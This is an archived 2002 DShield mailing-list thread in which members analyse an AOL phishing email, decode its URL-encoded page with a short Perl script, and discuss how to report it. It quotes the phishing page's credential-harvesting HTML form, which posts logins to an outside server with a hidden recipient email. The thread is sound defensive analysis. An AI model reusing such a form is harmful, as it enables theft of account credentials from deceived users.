[Dshield] OT?: some stuff, a firewall won't catch

Doug doug at dwhite.ws
Fri Nov 15 22:18:30 GMT 2002


You should forward that stuff to AOL

They will go after them big time!

================================
This address is filtered through the open relay database at
http://www.ordb.org
and is virus scanned by ANTIVIR
http://www.dwhite.ws
mailto:doug at dwhite.ws
================================
----- Original Message -----
From: "Patrick Oonk" <patrick.oonk at pine.nl>
To: <list at dshield.org>
Cc: <abuse at aol.com>; <abuse at verio.net>; <abuse at swbell.net>
Sent: Friday, November 15, 2002 1:34 PM
Subject: Re: [Dshield] OT?: some stuff, a firewall won't
catch


| On Fri, Nov 15, 2002 at 11:09:17AM -0500, Bernd Loske
wrote:
| > First:
| > It's your own fault, if you really go to the site below
and try to log in
| > with your account/password -- you have been warned.
|
| The page is 'encrypted' using URl encoding.
|
| I used the following simple perl script (tnx to
| http://tech-web.net/perl_memo.html)  to decode it.
|
| foreach(<>) {
|   print URLd($_);
| }
|
| sub URLd{
| my $URLdecode=shift;
| $URLdecode=~tr/+/ /;
| $URLdecode=~s/%([a-fA-F0-9]{2})/pack("C",hex($1))/eg;
| return $URLdecode;}
|
| $ perl ud < index.html |more
|
| The most noticable part is the following:
|
| <form action="http://64.143.44.63/cgi-local/crow.cgi"
| method="POST"name="login">^M
| ^M
| ^M
| <!-- This is the email where they go -->^M
| ^M
| <input type="hidden" name="recipient"
| value="JoshuaKneeland at email.com">^M
| ^M
| <!-- This is the email where they go.. end. -->^M
| ^M
| ^M
| ^M
| <input type="hidden"^M
|     name="subject" value="gp says kristi is god"><input^M
|     type="hidden" name="redirect"^M
|     value="http://love.aol.com/LoveMain/"><input
type="hidden"^M
|     name="phish" value><table border="0" cellpadding="2"^M
|     cellspacing="0" align="center">^M
|
| Also notice the CR's to end lines and the fact that parts
of
| it are created with Frontpage: the signs of a true loser.
|
| Patrick
|
| >
| > I found the email below in the inbox of my AOL account (
yeap - still have
| > that) this morning. I usually would have deleted it
right away, but I was
| > curious about what these spammers try now, to get your
time and money. So --
| > fire up lynx and go to the referenced page -- well --
after getting the
| > source and making it readable, it revealed a nice piece
of social
| > engineering. The casual observer might really think,
that he logs in into
| > AOL. And in doing so, his/her account/password gets
posted to some web
| > server in the process. I wonder how many AOL accounts
got compromised ? ...
| >
| > How do you catch that, except telling everybody over and
over, not to click
| > on links, to trust nobody and that the internet became a
bad place to be?
| >
| >
| >
| >
| > -----Original Message-----
| > From: RuffRyderLK at aol.com [mailto:RuffRyderLK at aol.com]
| > Sent: Thursday, November 14, 2002 7:08 PM
| > To: undisclosed-recipients:
| > Subject: You have an admirer!
| >
| >
| > Someone has sent you a secret message. <A
| > HREF=http://members.truepath.com/vegazisfun/>Click here
to redeem your
| > message now!</A>
| >
| > _______________________________________________
| > Dshield mailing list
| > Dshield at dshield.org
| > To change your subscription options (or unsubscribe),
see: http://www.dshield.org/mailman/listinfo/list
|
| --
|  Patrick Oonk    -   Pine Digital Security    -
patrick.oonk at pine.nl
|  T:+31-70-3111010 - F:+31-70-3111011 - Read news at
http://security.nl
|  PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4
7283 A4E7 4BBF
|                   One thing less to worry about...
|  Excuse of the day: Electricians made popcorn in the power
supply
|
| _______________________________________________
| Dshield mailing list
| Dshield at dshield.org
| To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list




More information about the list mailing list